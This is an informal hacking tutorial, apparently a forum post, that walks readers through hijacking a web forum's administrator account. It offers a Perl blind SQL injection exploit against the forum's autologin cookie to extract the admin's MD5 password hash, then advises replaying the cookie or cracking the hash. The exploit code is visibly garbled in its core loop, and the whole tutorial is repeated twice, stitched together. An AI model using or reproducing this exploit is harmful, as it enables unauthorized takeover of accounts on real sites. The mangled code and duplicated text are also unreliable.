First of all, what you guyz need is a forum to hack. Once you got the forum the next step is to find the user we want to hack. In common sense i can say that u want to hack the admin . The administrator is usually the first member of the forum, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you wish to hack. For this tutorial, let's say his/her ID is "3".
Now you are almost all set to go bcz you guyz know the site u wish to hack, and the member/administrator you wish to hack. For e.g "you are hacking the administrator of "http://www.xxxxxxxx.com", which is User ID "3".
Now before dreams come true u need a nice exploit. U can use this one given below ( preferably, for 1.3.1 forums)
--------------------------------------------------------------------------------
#!/usr/bin/perl -w
##################################################################
# This expoit works fine. Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Hacker"
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "..By Hacker. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].
";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current
";
last;
}
}
if ( length($outputs) < member_id=" . $user . " pass_hash=" . $outputs; exit; # Hacker -------------------------------------------------------------------------------- #For using the above perl script u need an activeperl. You can get it from here if u didn't hv the one and install it: -
#Don't close the programme if it takes some time bcz this is the finalisation phase which gives u the way to access the forum with admin privilages.
#Once the hash grabbing is complete, u r returned with full hash and UserID
#Now once u got the hash For e.g 8476t3f6534ty3bt6k6g6f4fj3jb1h0m
#Don't confuse with these numbers, it's useless unless u know how to use it.
#This is nothing but the admin's password encrypted by using theMD5 hash algorithm
#I think most of u heard that MD5 hash is impossible to crack. MD5s are impossible to reverse "once a string is MD5ed, there is no way to get it back to plain-text"
#It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash (as i already cracked MD5 hash, so it's not impossible)
#You can use any method, and any crackers to crack this hash
#Once you r done i.e u hv cracked the hash, you will be given a plain-text password (which is your gateway to enter the forum)
Now you are almost all set to go bcz you guyz know the site u wish to hack, and the member/administrator you wish to hack. For e.g "you are hacking the administrator of "http://www.xxxxxxxx.com", which is User ID "3".
Now before dreams come true u need a nice exploit. U can use this one given below ( preferably, for 1.3.1 forums)
--------------------------------------------------------------------------------
#!/usr/bin/perl -w
##################################################################
# This expoit works fine. Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Hacker"
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "..By Hacker. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].
";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current
";
last;
}
}
if ( length($outputs) < member_id=" . $user . " pass_hash=" . $outputs; exit; # Hacker -------------------------------------------------------------------------------- #For using the above perl script u need an activeperl. You can get it from here if u didn't hv the one and install it: -
#Don't close the programme if it takes some time bcz this is the finalisation phase which gives u the way to access the forum with admin privilages.
#Once the hash grabbing is complete, u r returned with full hash and UserID
#Now once u got the hash For e.g 8476t3f6534ty3bt6k6g6f4fj3jb1h0m
#Don't confuse with these numbers, it's useless unless u know how to use it.
#This is nothing but the admin's password encrypted by using theMD5 hash algorithm
#I think most of u heard that MD5 hash is impossible to crack. MD5s are impossible to reverse "once a string is MD5ed, there is no way to get it back to plain-text"
#It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash (as i already cracked MD5 hash, so it's not impossible)
#You can use any method, and any crackers to crack this hash
#Once you r done i.e u hv cracked the hash, you will be given a plain-text password (which is your gateway to enter the forum)
